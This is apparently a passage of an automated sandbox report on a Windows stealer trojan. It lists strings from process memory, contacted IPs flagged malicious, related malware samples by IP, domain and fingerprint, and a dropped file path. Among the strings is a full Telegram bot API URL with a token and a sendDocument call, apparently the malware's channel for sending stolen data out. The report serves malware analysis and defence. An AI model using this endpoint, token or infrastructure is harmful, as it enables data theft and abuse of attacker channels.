                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id13ResponseDRegAsm.exe, 0000000B.00000002.1660156451.0000000003135000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/10/wsat/faultRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/10/wsatRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id15ResponseRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id5ResponseDRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://api.telegram.orgdfilename.exe, 0000000D.00000002.2208257467.00000000033B7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/bot7519321746:AAGYAZdkHTqE4LvUc5fDNQGiIRvfmzNMLzk/sendDocumentTfilename.exe, 0000000D.00000002.2208257467.000000000339C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 0000000B.00000002.1660156451.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 0000000D.00000002.2208257467.000000000335D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id6ResponseRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.ip.sb/ip66dcad8f5f33a_crypted.exe, 00000000.00000002.1477865176.0000000003E25000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1659124190.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/04/scRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id1ResponseDRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id9ResponseRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id20RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id21RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://pastebin.comdfilename.exe, 0000000D.00000002.2208257467.0000000003374000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id22RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id23RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id24RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id24ResponseRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id1ResponseRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id21ResponseDRegAsm.exe, 0000000B.00000002.1660156451.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/08/addressingRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/04/trustRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id10RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id11RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id10ResponseDRegAsm.exe, 0000000B.00000002.1660156451.00000000031B8000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id12RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id16ResponseRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id13RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id14RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://api.telegram.orgfilename.exe, 0000000D.00000002.2208257467.00000000033B7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id15RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id16RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://pastebin.comfilename.exe, 0000000D.00000002.2208257467.0000000003374000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/02/trust/NonceRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id17RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://pastebin.comfilename.exe, 0000000D.00000002.2208257467.000000000336C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id18RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id5ResponseRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id19RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://smkn2sumbawabesar.sch.idRegAsm.exe, 0000000B.00000002.1660156451.00000000031EE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id15ResponseDRegAsm.exe, 0000000B.00000002.1660156451.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id10ResponseRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/02/trust/RenewRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id11ResponseDRegAsm.exe, 0000000B.00000002.1660156451.0000000003135000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tempuri.org/Entity/Id8ResponseRegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.orgfilename.exe, 0000000D.00000002.2208257467.000000000339C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyRegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            5.42.92.222
                            		unknownRussian Federation
                            		39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUtrue
                            149.154.167.220
                            		api.telegram.orgUnited Kingdom
                            		62041TELEGRAMRUtrue
                            104.20.4.235
                            		pastebin.comUnited States
                            		13335CLOUDFLARENETUStrue
                            194.163.35.141
                            		smkn2sumbawabesar.sch.idGermany
                            		6659NEXINTO-DEtrue

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1507478
                            Start date and time:2024-09-08 14:55:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 9m 39s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:23
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:66dcad8f5f33a_crypted.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@14/11@3/4
                            EGA Information:
                            • Successful, ratio: 75%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 215
                            • Number of non-executed functions: 42
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target Path.exe, PID 5204 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: 66dcad8f5f33a_crypted.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            09:57:26API Interceptor51x Sleep call for process: RegAsm.exe modified
                            09:57:38API Interceptor5581x Sleep call for process: filename.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            149.154.167.220IDMan.exeGet hashmaliciousFredy StealerBrowse
                              IDMan.exeGet hashmaliciousFredy StealerBrowse
                                RFQ.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                  RFQ DO NO17665.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    BN57miasVe.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      SecuriteInfo.com.BackDoor.SpyBotNET.58.29400.29032.exeGet hashmaliciousQuasar, Blank Grabber, Njrat, XWormBrowse
                                        1.exeGet hashmaliciousMicroClipBrowse
                                          YzvChS4FPi.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              Distributrnets.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                104.20.4.235envifa.vbsGet hashmaliciousRemcosBrowse
                                                • pastebin.com/raw/V9y5Q5vv
                                                New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                • pastebin.com/raw/NsQ5qTHr
                                                Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                • pastebin.com/raw/NsQ5qTHr
                                                Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                • pastebin.com/raw/NsQ5qTHr
                                                Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                                • pastebin.com/raw/NsQ5qTHr
                                                Update on Payment.jsGet hashmaliciousWSHRATBrowse
                                                • pastebin.com/raw/NsQ5qTHr
                                                194.163.35.141gobEmOm5sr.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  pastebin.comSX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                  • 104.20.3.235
                                                  IMKssbDprn.exeGet hashmaliciousUnknownBrowse
                                                  • 104.20.4.235
                                                  AMERICAN GROUP.jsGet hashmaliciousRemcosBrowse
                                                  • 104.20.4.235
                                                  1.exeGet hashmaliciousMicroClipBrowse
                                                  • 172.67.19.24
                                                  Server.exeGet hashmaliciousUnknownBrowse
                                                  • 104.20.4.235
                                                  invoice.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                                                  • 172.67.19.24
                                                  FRENCH GROUP.jsGet hashmaliciousRemcosBrowse
                                                  • 172.67.19.24
                                                  _PDF__838754.msiGet hashmaliciousMetamorfoBrowse
                                                  • 104.20.3.235
                                                  CDf7AZWbMo.exeGet hashmaliciousDCRatBrowse
                                                  • 104.20.3.235
                                                  French Group.jsGet hashmaliciousRemcosBrowse
                                                  • 104.20.4.235
                                                  api.telegram.orgIDMan.exeGet hashmaliciousFredy StealerBrowse
                                                  • 149.154.167.220
                                                  IDMan.exeGet hashmaliciousFredy StealerBrowse
                                                  • 149.154.167.220
                                                  RFQ.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  RFQ DO NO17665.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  BN57miasVe.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  • 149.154.167.220
                                                  SecuriteInfo.com.BackDoor.SpyBotNET.58.29400.29032.exeGet hashmaliciousQuasar, Blank Grabber, Njrat, XWormBrowse
                                                  • 149.154.167.220
                                                  1.exeGet hashmaliciousMicroClipBrowse
                                                  • 149.154.167.220
                                                  YzvChS4FPi.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  Distributrnets.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  TELEGRAMRUIDMan.exeGet hashmaliciousFredy StealerBrowse
                                                  • 149.154.167.220
                                                  IDMan.exeGet hashmaliciousFredy StealerBrowse
                                                  • 149.154.167.220
                                                  RFQ.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  RFQ DO NO17665.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  BN57miasVe.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  • 149.154.167.220
                                                  SecuriteInfo.com.Variant.Lazy.587384.1674.426.exeGet hashmaliciousLummaC, VidarBrowse
                                                  • 149.154.167.99
                                                  SecuriteInfo.com.BackDoor.SpyBotNET.58.29400.29032.exeGet hashmaliciousQuasar, Blank Grabber, Njrat, XWormBrowse
                                                  • 149.154.167.220
                                                  vjgg.exeGet hashmaliciousLummaC, VidarBrowse
                                                  • 149.154.167.99
                                                  1.exeGet hashmaliciousMicroClipBrowse
                                                  • 149.154.167.220
                                                  YzvChS4FPi.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUarm5.elfGet hashmaliciousUnknownBrowse
                                                  • 5.42.83.155
                                                  SecuriteInfo.com.Trojan.Win64.Krypt.13435.32435.exeGet hashmaliciousUnknownBrowse
                                                  • 5.42.101.19
                                                  7NtKYH4Ejx.exeGet hashmaliciousNymaimBrowse
                                                  • 5.42.64.3
                                                  7NtKYH4Ejx.exeGet hashmaliciousNymaimBrowse
                                                  • 5.42.64.3
                                                  https://d.metrckter.com/1pwkqpuod22w.htmlGet hashmaliciousUnknownBrowse
                                                  • 5.42.103.144
                                                  9c0e6f401644a7fe1eabace6fe5e0b10c20c73db7c28b.exeGet hashmaliciousRedLineBrowse
                                                  • 5.42.92.213
                                                  injector.exeGet hashmaliciousRedLineBrowse
                                                  • 5.42.92.213
                                                  P8Cw9drW3m.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                  • 45.15.159.127
                                                  a86htsmUe5.exeGet hashmaliciousRedLineBrowse
                                                  • 5.42.92.213
                                                  SecuriteInfo.com.Trojan.PWS.RedLineNET.9.15216.6695.exeGet hashmaliciousRedLineBrowse
                                                  • 5.42.65.96
                                                  NEXINTO-DEgobEmOm5sr.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                  • 194.163.35.141
                                                  220204-TF1--00.exeGet hashmaliciousFormBookBrowse
                                                  • 194.233.65.154
                                                  20-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
                                                  • 194.233.65.154
                                                  RFQ STR-160-01.exeGet hashmaliciousFormBookBrowse
                                                  • 194.233.65.154
                                                  mirai.mips.elfGet hashmaliciousMiraiBrowse
                                                  • 194.195.59.215
                                                  SecuriteInfo.com.Linux.Siggen.9999.19003.7982.elfGet hashmaliciousMiraiBrowse
                                                  • 212.228.122.21
                                                  quotation.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                  • 194.233.65.154
                                                  Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                                                  • 194.195.220.41
                                                  031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                                                  • 194.233.65.154
                                                  Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                                                  • 194.233.65.154
                                                  CLOUDFLARENETUSSX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                  • 162.159.130.233
                                                  prop-secure.b-cdn.net.ps1Get hashmaliciousUnknownBrowse
                                                  • 188.114.97.3
                                                  Bulk Image Downloader.exeGet hashmaliciousLummaCBrowse
                                                  • 104.21.26.150
                                                  spam.b-cdn.net.ps1Get hashmaliciousLummaCBrowse
                                                  • 104.21.26.150
                                                  5roYDCAVn0.exeGet hashmaliciousSimda StealerBrowse
                                                  • 172.67.165.210
                                                  OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                  • 188.114.96.3
                                                  IMKssbDprn.exeGet hashmaliciousUnknownBrowse
                                                  • 162.159.134.233
                                                  5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                  • 188.114.96.3
                                                  z1Io2AQrOZ.exeGet hashmaliciousAzorultBrowse
                                                  • 104.21.69.232
                                                  RFQ.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.97.3

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  3b5074b1b5d032e5620f69f9f700ff0eSX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                  • 149.154.167.220
                                                  • 194.163.35.141
                                                  • 104.20.4.235
                                                  prop-secure.b-cdn.net.ps1Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  • 194.163.35.141
                                                  • 104.20.4.235
                                                  spam.b-cdn.net.ps1Get hashmaliciousLummaCBrowse
                                                  • 149.154.167.220
                                                  • 194.163.35.141
                                                  • 104.20.4.235
                                                  bin homebots io.batGet hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  • 194.163.35.141
                                                  • 104.20.4.235
                                                  de7s.txt.ps1Get hashmaliciousLummaCBrowse
                                                  • 149.154.167.220
                                                  • 194.163.35.141
                                                  • 104.20.4.235
                                                  yJrZoOsgfl.exeGet hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  • 194.163.35.141
                                                  • 104.20.4.235
                                                  IMKssbDprn.exeGet hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  • 194.163.35.141
                                                  • 104.20.4.235
                                                  WBmC56ADQF.lnkGet hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  • 194.163.35.141
                                                  • 104.20.4.235
                                                  uScqjqUS1m.exeGet hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  • 194.163.35.141
                                                  • 104.20.4.235
                                                  CVSIyqGKKK.exeGet hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  • 194.163.35.141
                                                  • 104.20.4.235

                                                  Dropped Files

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\Users\user\AppData\Local\Temp\filename.exegobEmOm5sr.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse

                                                    Created / dropped Files

                                                    C:\ProgramData\Path\Path.exe

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\Temp\filename.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):768436224
